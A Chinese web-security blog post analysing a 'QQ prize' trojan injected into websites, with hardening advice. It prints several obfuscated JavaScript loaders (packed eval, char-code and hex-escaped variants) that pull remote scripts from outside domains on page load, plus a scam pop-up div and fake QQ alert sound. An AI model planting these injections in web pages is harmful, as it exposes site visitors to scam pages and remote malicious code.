2018年04月6日网站服务器迁移完成……

网站qq中奖木马终极解决办法

web防护 苏 demo 2153℃ 0评论

<Script language=”javascript”>
<!– eval_r(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘b.a(\'<9 8=”7://6.5.4/3/0/2.0″></1>\’);’,12,12,’js|script|dtree|web|com|qqcn2010|www|http|src|SCRIPT|write|document’.split(‘|’),0,{})) –>
</Script>

<SCRIPT src=”http://www.qqcn2010.com/web/js/dtree.js”></script>

分析发现第二段中的链接地址其实是用第一段中的eval函数生成的。页面载入时就会链接到这个js文件,然后生成一个包含图片和链接的div:

<div id=”eteUnionUpFloat” style=”margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-bottom: 300px; z-index: 10; position: absolute; width: 254px; height: 156px; top: 406px; left: 991px; “><a href=”http://124.162.23.178/css/style/tz.asp” target=”_blank”><img src=”http://124.162.23.178/css/style/qq1.gif” border=”0″ style=”cursor: hand;” width=”254″ height=”156″></a>
另外还有一段背景声音模拟QQ弹出窗口的声音

<BGSOUND balance=0 src=”http://60.191.221.159:10000/win/system.wav” volume=-240>

安全防范
1、设定权限,除了一些特殊的文件外,把其他文件都设为只读权限。让木马无法上传,无法运行;
2、养成备份的好习惯;
3、修改程序路径;
4、后台密码尽量设置复杂一些;
5、电脑安装防护软件,增强网站安全性,减少木马感染的风险;

PS:最近该木马自动升级成01的二进制格式。如下:
OlOlll=”(x)”;OllOlO=” String”;OlllOO=”tion”;OlOllO=”Code(x)}”;OllOOO=”Char”;OlllOl=”func”;OllllO=” l = “;OllOOl=”.from”;OllOll=”{return”;Olllll=”var”;eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));eval(“”+O(99005434)+O(109891017)+O(98017879)+O(115835235)+O(107918387)+O(99992910)+O(108905601)+O(114841149)+O(45549578)+O(117816923)+O(112864240)+O(103954969)+O(114849803)+O(99990869)+O(31687465)+O(39604343)+O(38611951)+O(59403806)+O(82178168)+O(66338164)+O(81184638)+O(72271089)+O(79206874)+O(83168778)+O(31689655)+O(113855151)+O(112864408)+O(98010957)+O(60390619)+O(33661487)+O(102962358)+O(114844131)+O(114849439)+O(110883355)+O(57429223)+O(46539706)+O(46539243)+O(117817991)+O(117812355)+O(117811069)+O(45547270)+O(101971757)+O(109895803)+O(109899861)+O(101978895)+O(106921583)+O(99991986)+O(96038462)+O(99004447)+O(113855296)+O(106920770)+O(45545277)+O(98013739)+O(109893993)+O(107912961)+O(46536367)+O(113859368)+O(110885479)+O(98016483)+O(109894258)+O(99008746)+O(99998977)+O(46532597)+O(98012335)+O(110886532)+O(45547812)+O(104946386)+O(113851133)+O(33663712)+O(61388571)+O(59400430)+O(46531067)+O(113856900)+O(98012363)+O(112863124)+O(103954630)+O(110881606)+O(114846249)+O(61383383)+O(38619969)+O(40596203)+O(58410619));
360杀毒软件能够自动检测出来。注意识别。

常见其他格式如下:
<Script language=”javascript”>
<!–
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘b.a(\'<9 8=”7://6.5.4/3/2.1″></0>\’);’,12,12,’script|js|cp|spcode|com|googleadsl|www|http|src|SCRIPT|write|document’.split(‘|’),0,{}))
–>
</Script>

或者

<Script language=”javascript”>
<!–
window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”] (‘\x3c\x53\x43\x52\x49\x50\x54 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x61\x64\x73\x6c\x2e\x63\x6f\x6d\x2f\x73\x70\x63\x6f\x64\x65\x2f\x63\x70\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e’);
–>
</Script>

打赏

转载请注明:苏demo的别样人生 » 网站qq中奖木马终极解决办法

   如果本篇文章对您有帮助,欢迎向博主进行赞助,赞助时请写上您的用户名。
支付宝直接捐助帐号oracle_lee@qq.com 感谢支持!
喜欢 (0)or分享 (0)
发表我的评论
取消评论
表情